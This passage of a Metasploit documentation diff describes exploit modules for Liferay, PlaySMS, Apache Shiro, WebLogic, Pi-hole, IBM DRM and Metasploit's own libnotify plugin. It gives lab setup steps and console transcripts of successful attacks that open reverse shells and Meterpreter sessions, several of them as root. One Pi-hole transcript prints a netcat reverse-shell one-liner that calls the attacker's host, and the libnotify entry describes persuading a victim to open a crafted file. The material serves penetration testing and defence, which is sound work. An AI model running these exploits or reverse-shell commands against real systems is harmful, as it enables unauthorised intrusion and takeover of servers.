+Module defaults work very well, you should just need to set `RHOSTS`!
+
+## Scenarios
+
+A successful exploit will look like this:
+
+```
+msf5 exploit(linux/ssh/ibm_drm_a3user) > run
+[*] 10.22.22.212:22 - Attempting to login to the IBM Data Risk Manager appliance...
+[+] 10.22.22.212:22 - Login Successful (a3user:idrm)
+[*] Found shell.
+[*] Command shell session 5 opened (10.22.22.1:45489 -> 10.22.22.212:22) at 2020-04-22 12:10:13 +0700
+[*] 10.22.22.212:22 - Escalating privileges to root, please wait a few seconds...
+[+] 10.22.22.212:22 - Done, enjoy your root shell!
+uname -a
+Linux idrm-server.ibm.com 3.10.0-862.3.2.el7.x86_64 #1 SMP Tue May 15 18:22:15 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=0(root) gid=0(root) groups=0(root)
+```

documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md

@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java unmarshalling vulnerability via JSONWS in
+Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1
+GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
+
+### Setup
+
+Install Docker using the [official instructions](https://docs.docker.com/get-docker/).
+Follow the instructions for your platform and distribution (if using
+Linux). If you're using OS X, you may prefer to `brew cask install docker`
+after installing [Homebrew](https://brew.sh/).
+
+**Note:** You may want to increase Docker's memory capacity up to 4 GB.
+Liferay will crash at 2 GB or less. 4 GB seems to be the sweet spot.
+
+Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
+added `7.2.0-ga1` tag) as per Liferay's [Docker Hub instructions](https://hub.docker.com/r/liferay/portal).
+Any dependencies will be pulled automatically.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This targets Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4,
+and 7.2.1 GA2.
+
+## Options
+
+### SRVPORT
+
+If you are testing the [Docker container](#setup), which binds to port
+8080 by default, set this to a different port to avoid a port conflict
+with the remote classloading server.
+
+## Scenarios
+
+### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal)
+
+```
+msf5 > use exploit/multi/http/liferay_java_unmarshalling
+msf5 exploit(multi/http/liferay_java_unmarshalling) > options
+
+Module options (exploit/multi/http/liferay_java_unmarshalling):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2
+
+
+msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
+srvport => 8888
+msf5 exploit(multi/http/liferay_java_unmarshalling) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
+[*] Using URL: http://0.0.0.0:8888/
+[*] Local IP: http://192.168.1.3:8888/
+[+] Started remote classloader server at http://192.168.1.3:8888/
+[*] Sending remote classloader gadget to http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
+[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
+[+] Sending constructor class
+[*] GET /metasploit/Payload.class requested
+[+] Sending payload class
+[*] HEAD /metasploit.dat requested
+[+] Sending 200
+[*] GET /metasploit.dat requested
+[+] Sending payload config
+[*] HEAD /metasploit/Payload.class requested
+[+] Sending 200
+[*] GET /metasploit/Payload.class requested
+[+] Sending payload class
+[*] Sending stage (53928 bytes) to 192.168.1.3
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: liferay
+meterpreter > sysinfo
+Computer    : 588a96d744cb
+OS          : Linux 4.19.76-linuxkit (amd64)
+Meterpreter : java/linux
+meterpreter >
+```

documentation/modules/exploit/multi/http/playsms_template_injection.md

@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom PHP template system called 'TPL' which is used in the PlaySMS template engine at `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a second time, results in code execution.
+
+The TPL (https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.
+
+### Setup
+
+Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download).
+
+ 1. Download the application
+ 2. Extract : `tar -xvf playsms-1.4.2.tar.gz`
+ 3. Move in to the web directory : `mv playsms-1.4.2/web/* /var/www/html/`
+ 4. Make the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
+ 5. Change the owner : `chown -R www-data:www-data /var/www/html/`
+ 6. Set DB creds in the config.php file and dump playsms-1.4.2/db/playsms.sql in to your playsms database
+ 7. Now visit : http://localhost/
+
+## Verification Steps
+
+ 1. Install the application (Tested on HactheBox Frolic Machine)
+ 2. Start msfconsole
+ 3. Do: `use exploit/multi/http/playsms_template_injection`
+ 4. Do: `set rport <port>`
+ 5. Do: `set rhost <ip>`
+ 6. Do: `set targeturi /playsms`
+ 7. Do: `check`
+
+```
+[*] 10.10.10.111:9999 - The target appears to be vulnerable.
+```
+
+ 10. Do: `set lport <port>`
+ 11. Do: `set lhost <ip>`
+ 12. Do: `run`
+ 13. You should get a shell.
+
+## Scenarios
+
+### Playsms on Ubuntu Linux
+
+```
+msf5 exploit(multi/http/playsms_template_injection) > options
+
+Module options (exploit/multi/http/playsms_template_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base playsms directory path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PlaySMS Before 1.4.3
+
+
+msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(multi/http/playsms_template_injection) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f
+[*] Trying to Send Payload in Username Field ......
+[+] Payload successfully sent
+[*] Cookies here : PHPSESSID=p0jmmf1kpqfhpbpcgpbcfbhpv3;
+[*] Sending stage (38288 bytes) to 192.168.1.3
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:51800) at 2020-04-02 17:30:53 -0500
+
+meterpreter > getuid
+Server username: www-data (1000)
+meterpreter > sysinfo
+Computer    : ec31d13f3520
+OS          : Linux ec31d13f3520 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```

documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md

@@ -0,0 +1,41 @@
+## Description
+
+Apache Shiro v1.2.4 is vulnerable to a Java deserialization vulnerability. An
+unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
+server as the value to the `rememberMe` cookie. This will result in code
+execution in the context of the web server.
+
+The YSoSerial `CommonsCollections2` payload is known to work and is the one
+leveraged by this module.
+
+## Vulnerable Application
+
+[Shiro RememberMe 1.2.4](https://github.com/Medicean/VulApps/tree/master/s/shiro/1)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/multi/http/shiro_rememberme_v124_deserialize`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested on GNU/Linux x86_64 using Shiro-1.2.4
+
+```
+msf5 > use exploit/multi/http/shiro_rememberme_v124_deserialize
+msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > set rhosts 192.168.1.11
+rhosts => 192.168.1.11
+msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Command shell session 2 opened (192.168.1.2:4444 -> 192.168.1.11:36206) at 2019-02-04 20:16:27 +0800
+
+whoami
+root
+exit
+[*] 192.168.1.11 - Command shell session 2 closed.
+```

documentation/modules/exploit/multi/misc/ibm_tm1_unauth_rce.md

@@ -17,7 +17,7 @@ Testing was done on IBM PA 2.0.6 and IBM TM1 10.2.2 on Windows and Linux.
 
 Versions up to and including PA 2.0.8 are vulnerable. It is likely that versions earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014).
 
-Users are encouraged to share success stories with the module author, Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security. For more information, check the full advisory at https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-tm1-rce.txt.
+Users are encouraged to share success stories with the module author, Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security. For more information, check the full advisory at https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_tm1_rce.md.
 
 ### Setup
 

documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md

@@ -0,0 +1,102 @@
+## Vulnerable Application
+
+  There exists a Java object deserialization vulnerability
+  in multiple versions of WebLogic.
+
+  Unauthenticated remote code execution can be achieved
+  by sending a serialized `BadAttributeValueExpException` object
+  over the T3 protocol to vulnerable WebLogic servers.
+
+  This module has been tested against versions `v12.1.3.0.0`,
+  `v12.2.1.3.0`, and `v12.2.1.4.0`.
+
+  WebLogic versions can be downloaded from [here](https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html).
+
+### Installation
+
+  Some version of Java 8 JDK is required to be installed on the server.
+  This module has been tested successfully using jdk8u202 and [jdk8u251](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html).
+
+  Installation instructions for WebLogic can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).
+
+  On step 10 of the installation instructions, keep the
+  `Run Quickstart` box checked and click `done`. A new window
+  should pop up. Select `Create a new domain` -> `next`.
+  Ensure `Basic WebLogic Server Domain` is selected and click `next`.
+  Create credentials and select `next`. Domain mode can be either
+  `Production` or `Development`, then click `next`. Click `next` again
+  and select `Create`. Click `next` a couple more times, then click
+  `finish`.
+
+  To start WebLogic, execute the `startWebLogic` script in
+  `Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/`.
+
+## Verification Steps
+
+- [ ] Install the application
+- [ ] Start msfconsole
+- [ ] Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
+- [ ] Do: ```set RHOSTS <ip>```
+- [ ] Do: ```run```
+- [ ] You should get a meterpreter session.
+
+## Scenarios
+### WebLogic `v12.2.1.4` on Windows 10
+
+  ```
+  msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185
+  rhosts => 172.16.215.185
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1
+  lhost => 172.16.215.1
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run
+
+  [*] Started reverse TCP handler on 172.16.215.1:4444
+  [*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0
+  [*] 172.16.215.185:7001 - Sending handshake...
+  [*] 172.16.215.185:7001 - Formatting payload...
+  [*] 172.16.215.185:7001 - Sending object...
+  [*] Sending stage (176195 bytes) to 172.16.215.185
+  [*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.185:50795) at 2020-05-15 09:37:45 -0500
+
+  meterpreter > getuid
+  Server username: DESKTOP-AQT4EG1\space
+  meterpreter > sysinfo
+  Computer        : DESKTOP-AQT4EG1
+  OS              : Windows 10 (10.0 Build 18362).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 4
+  Meterpreter     : x86/windows
+  ```
+
+### WebLogic `v12.1.3.0.0` on Ubuntu 18.04 Linux
+
+  ```
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
+  target => 1
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196
+  rhosts => 172.16.215.196
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run
+
+  [*] Started reverse TCP handler on 172.16.215.1:4444 
+  [*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0
+  [*] 172.16.215.196:7001 - Sending handshake...
+  [*] 172.16.215.196:7001 - Formatting payload...
+  [*] 172.16.215.196:7001 - Sending object...
+  [*] Sending stage (3012516 bytes) to 172.16.215.196
+  [*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500
+  [*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)
+
+  meterpreter > getuid
+  Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
+  meterpreter > sysinfo
+  Computer     : 172.16.215.196
+  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  ```

documentation/modules/exploit/osx/local/vmware_fusion_lpe.md

@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.2. The `Open VMware USB Arbitrator Service` can be
+This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3. The `Open VMware USB Arbitrator Service` can be
 launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home
 directory in a specific folder, and creating a hard link to the `Open VMware USB Arbitrator Service`, we're able to launch it
 temporarily to start our payload with an effective UID of 0.

documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md

@@ -0,0 +1,130 @@
+## Vulnerable Application
+
+Metasploit Framework versions prior to 5.0.86 are vulnerable to a command
+injection vulnerability in the default `libnotify` plugin. The `libnotify`
+plugin fails to properly parse the argument array to an executed operating
+system command. If an attacker can convince a user running an affected version
+of the Metasploit Framework with the `libnotify` plugin loaded to import a
+specially crafted data file with `db_import`, they can execute a command within
+the context of the user running Metasploit.
+
+In order to trigger the vulnerable code path, the service reported must be
+unique. This means that when the exploit file is loaded, it will not trigger the
+vulnerability again unless the service is removed. The easiest way to remove the
+service is to delete all services from the database using the `services -d`
+command.
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/unix/fileformat/metasploit_libnotify_cmd_injection`
+  4. Set options as appropriate
+  5. Do: `exploit`
+  6. Start a payload handler using `exploit/multi/handler`
+  7. Transfer the file to the intended target and convince them to open it
+
+## Scenarios
+
+### Metasploit Framework v5.0.76
+
+
+```
+msf5 > use exploit/unix/fileformat/metasploit_libnotify_cmd_injection 
+msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > show options 
+
+Module options (exploit/unix/fileformat/metasploit_libnotify_cmd_injection):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   FILENAME  scan.xml         no        The file to write.
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL  /bin/bash        yes       The system shell to use.
+
+   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > exploit
+
+[*] Writing xml file: scan.xml
+[+] scan.xml stored at /home/smcintyre/.msf4/local/scan.xml
+msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > use exploit/multi/handler 
+msf5 exploit(multi/handler) > show options 
+
+Module options (exploit/multi/handler):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL  /bin/bash        yes       The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Wildcard Target
+
+
+msf5 exploit(multi/handler) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+^C[-] Exploit failed [user-interrupt]: Interrupt 
+[-] exploit: Interrupted
+msf5 exploit(multi/handler) > exploit -j
+[*] Exploit running as background job 3.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+msf5 exploit(multi/handler) > version
+Framework: 5.0.76-dev-50cfb07cff
+Console  : 5.0.76-dev-50cfb07cff
+msf5 exploit(multi/handler) > load libnotify
+[*] Successfully loaded plugin: libnotify
+msf5 exploit(multi/handler) > services -d
+Services
+========
+
+host  port  proto  name  state  info
+----  ----  -----  ----  -----  ----
+
+msf5 exploit(multi/handler) > db_import /home/smcintyre/.msf4/local/scan.xml
+[*] Importing 'Nmap XML' data
+[*] Import: Parsing with 'Nokogiri v1.10.8'
+[*] Importing host 192.168.20.121
+sh: line 1: State:: command not found
+sh: line 2: Proto:: command not found
+sh: -c: line 3: unexpected EOF while looking for matching `''
+sh: -c: line 4: syntax error: unexpected end of file
+[*] Successfully imported /home/smcintyre/.msf4/local/scan.xml
+msf5 exploit(multi/handler) > [*] Command shell session 4 opened (192.168.159.128:4444 -> 192.168.159.128:35516) at 2020-04-16 14:54:39 -0400
+
+msf5 exploit(multi/handler) > sessions -i 4
+[*] Starting interaction with 4...
+
+id
+uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),10(wheel),974(wireshark),975(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+```

documentation/modules/exploit/unix/http/pihole_blocklist_exec.md

@@ -0,0 +1,142 @@
+## Vulnerable Application
+
+This exploits a command execution in Pi-Hole <= 4.4.  A new blocklist is added, and then an
+update is forced (gravity) to pull in the blocklist content.  PHP content is then written
+to a file within the webroot.
+
+Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc.
+
+Phase 2 writes our payload to `teleporter.php`, overwriting, the content.
+
+Lastly, the phase 1 PHP file is called in the web root, which launches
+our payload in `teleporter.php` with root privileges.
+
+A more detailed writeup is available from the [original author](https://frichetten.com/blog/cve-2020-11108-pihole-rce/).
+
+Due to encodings, a local web server is required to be running on port `80`.
+
+Two blocklist is left within Pi-Hole and should be removed.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/unix/http/pihole_blocklist_exec```
+  4. Do: ```set srvhost [IP]```
+  5. Do: ```set rhost [IP]```
+  6. Do: ```run```
+  7. You should get a root shell.
+
+## Options
+
+### Password
+
+Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to change/remove it.
+
+## Scenarios
+
+### Pi-Hole 4.3.2 on Ubuntu 18.04
+
+  ```
+  [*] Processing pihole.rb for ERB directives.
+  resource (pihole.rb)> use exploit/unix/http/pihole_blocklist_exec
+  resource (pihole.rb)> set payload php/meterpreter/reverse_tcp
+  payload => php/meterpreter/reverse_tcp
+  resource (pihole.rb)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (pihole.rb)> set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  resource (pihole.rb)> set srvhost 1.1.1.1
+  srvhost => 1.1.1.1
+  resource (pihole.rb)> set srvport 80
+  srvport => 80
+  resource (pihole.rb)> set verbose true
+  verbose => true
+  resource (pihole.rb)> exploit
+  [*] Exploit running as background job 0.
+  [*] Exploit completed, but no session was created.
+  
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3.2
+  [*] Using URL: http://1.1.1.1:80/
+  [*] Using cookie: PHPSESSID=45abdcp4rsc9bpi9tchi88ejnn;
+  [*] Using token: WzmrFbksWxIbtuSVeyrf8yv9o541UdhueLN+BRXfUmY=
+  [*] Adding backdoor reference
+  [*] Forcing gravity pull
+  [*] (1/2) Sending priv esc trigger
+  [*] Adding root reference
+  [*] Forcing gravity pull
+  [*] (2/2) Sending root payload
+  [*] Popping root shell
+  [*] Sending stage (38288 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:57982) at 2020-05-12 22:30:38 -0400
+  [+] Deleted cdJWzln.php
+  [*] Server stopped.
+  
+  msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1
+  [*] Starting interaction with 1...
+  
+  meterpreter > getuid
+  Server username: root (0)
+  meterpreter > sysinfo
+  Computer    : pihole
+  OS          : Linux pihole 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64
+  Meterpreter : php/linux
+  ```
+
+### Pi-Hole 4.4 on Ubuntu 18.04
+
+  ```
+  [*] Processing pihole.rb for ERB directives.
+  resource (pihole.rb)> use exploit/unix/http/pihole_blocklist_exec
+  resource (pihole.rb)> set payload php/meterpreter/reverse_tcp
+  payload => php/meterpreter/reverse_tcp
+  resource (pihole.rb)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (pihole.rb)> set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  resource (pihole.rb)> set srvhost 1.1.1.1
+  srvhost => 1.1.1.1
+  resource (pihole.rb)> set srvport 80
+  srvport => 80
+  resource (pihole.rb)> set verbose true
+  verbose => true
+  resource (pihole.rb)> exploit
+  [*] Exploit running as background job 0.
+  [*] Exploit completed, but no session was created.
+  
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.4
+  [*] Using URL: http://1.1.1.1:80/
+  [*] Using cookie: PHPSESSID=uee4gcfsjk5m8289m4uk4rv1du;
+  [*] Using token: uO4ha1e0fy+Qwvoq14XgslT3Z+VJ/h2RR3qyVT6dPz8=
+  [*] Adding backdoor reference
+  [*] Forcing gravity pull
+  [*] Received GET request.  Responding
+  [*] Sending 2nd gravity update request.
+  [*] Forcing gravity pull
+  [*] (1/2) Sending priv esc trigger
+  [*] Adding root reference
+  [*] Forcing gravity pull
+  [*] Received GET request.  Responding
+  [*] Sending 2nd gravity update request.
+  [*] Forcing gravity pull
+  [*] (2/2) Sending root payload
+  [*] Popping root shell
+  [*] Sending stage (38288 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:48636) at 2020-05-13 20:34:33 -0400
+  [+] Deleted VRwxqyhs.php
+  
+  msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1
+  [*] Starting interaction with 1...
+  
+  meterpreter > getuid
+  Server username: root (0)
+  meterpreter > sysinfo
+  Computer    : pihole
+  OS          : Linux pihole 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64
+  Meterpreter : php/linux
+  meterpreter > 
+  [*] Blocklists must be removed manually from /admin/settings.php?tab=blocklists
+  [*] Server stopped.
+  ```

documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md

@@ -0,0 +1,157 @@
+## Vulnerable Application
+
+This exploits a command execution in Pi-Hole <= 4.3.2. A new DHCP
+static lease is added with a MAC address which includes an RCE.
+DHCP server is not required to be running.
+
+Exploitation has many constraints, outlined in the original
+[technical writeup](https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/).
+
+1. Exploitation requires `/opt/pihole` to be first in the `$PATH` due to
+exploitation constraints.
+2. Payload must not contain `%00`
+3. Payload must be all capital letters
+
+### Setup
+
+Install Pi-Hole [Pi-Hole 4.3](https://github.com/pi-hole/pi-hole/releases/tag/v4.3)
+with the following commands:
+
+  ```
+  sudo git clone --depth=1 -b v4.3 https://github.com/pi-hole/pi-hole.git /etc/.pihole
+  # replace 'git clone' with 'git clone -b v4.3'
+  sudo nano /etc/.pihole/automated\ install/basic-install.sh
+  sudo ./basic-install.sh
+  ```
+
+Pi-Hole attempts to install the latest versions of the software.  Modifying the git clone
+command will force it to install the old AdminLTE and Pi-Hole versions.  However this
+will make FTL fail to install.
+
+Answer everything with the default.
+
+Lastly, we need to create one file which wasn't made.
+
+```
+sudo touch /etc/pihole/GitHubVersions
+```
+
+If `/opt/pihole` isn't in the path (for php/lighttp) because the install process wasn't 100% due
+to the forcing of version 4.3, edit `/etc/lighttpd/conf-available/15-fastcgi-php.conf` and
+add a new item to bin-environment.
+
+```
+"PATH" => "opt/pihole:" + env.PATH
+```
+
+This will be enough to make it exploitable, however the dashboard won't fully work since some
+other components were installed which are too new for it to work with.
+
+If you wish to install FTL, follow the [directions](https://docs.pi-hole.net/ftldns/compile/).
+
+### Setup (docker)
+
+```
+$ cat docker-compose.yml
+version: "3"
+
+# More info at https://github.com/pi-hole/docker-pi-hole/ and https://docs.pi-hole.net/
+services:
+  pihole:
+    container_name: pihole
+    image: pihole/pihole:4.3
+    ports:
+#      - "53:53/tcp"
+#      - "53:53/udp"
+#      - "67:67/udp"
+      - "80:80/tcp"
+#      - "443:443/tcp"
+    environment:
+      TZ: 'America/Chicago'
+      WEBPASSWORD: 'password123'
+    # Volumes store your data between container upgrades
+    #volumes:
+    #   - './etc-pihole/:/etc/pihole/'
+    #   - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
+    dns:
+      - 127.0.0.1
+      - 1.1.1.1
+    # Recommended but not required (DHCP needs NET_ADMIN)
+    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
+    cap_add:
+      - NET_ADMIN
+    restart: unless-stopped
+```
+
+### Cleanup
+
+This will attempt to clean entries in `/etc/dnsmasq.d/04-pihole-static-dhcp.conf`.
+However, on failure, `sudo pihole -a removestaticdhcp <MAC>` can be used to remove them.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/unix/http/pihole_dhcp_mac_exec```
+  4. Do: ```set rhosts```
+  4. Do: ```run```
+  5. You should get a shell.
+
+## Options
+
+### Password
+
+Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to change/remove it.
+
+## Scenarios
+
+### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/unix/http/pihole_dhcp_mac_exec
+  [*] Using exploit/unix/http/pihole_dhcp_mac_exec
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lport 8888
+  lport => 8888
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set password password123
+  password => password123
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set verbose true
+  verbose => true
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > run
+  
+  [+] mkfifo /tmp/wvfacoc; nc 1.1.1.1 8888 0</tmp/wvfacoc | /bin/sh >/tmp/wvfacoc 2>&1; rm /tmp/wvfacoc
+  [*] Started reverse TCP handler on 1.1.1.1:8888 
+  [+] Version Detected: 4.3
+  [*] Using cookie: PHPSESSID=4ce3tjd269lcut95orff4a45l8;
+  [*] Login required, attempting login.
+  [*] Using token: czTyD7HbrcwZfTS7gJg4xgxSkB/CjGNlJPTUueA0ACk=
+  [*] Validating path with MAC: 8D540FBF0F5F
+  [+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+  [*] Payload MAC will be: 818CC59E2B82
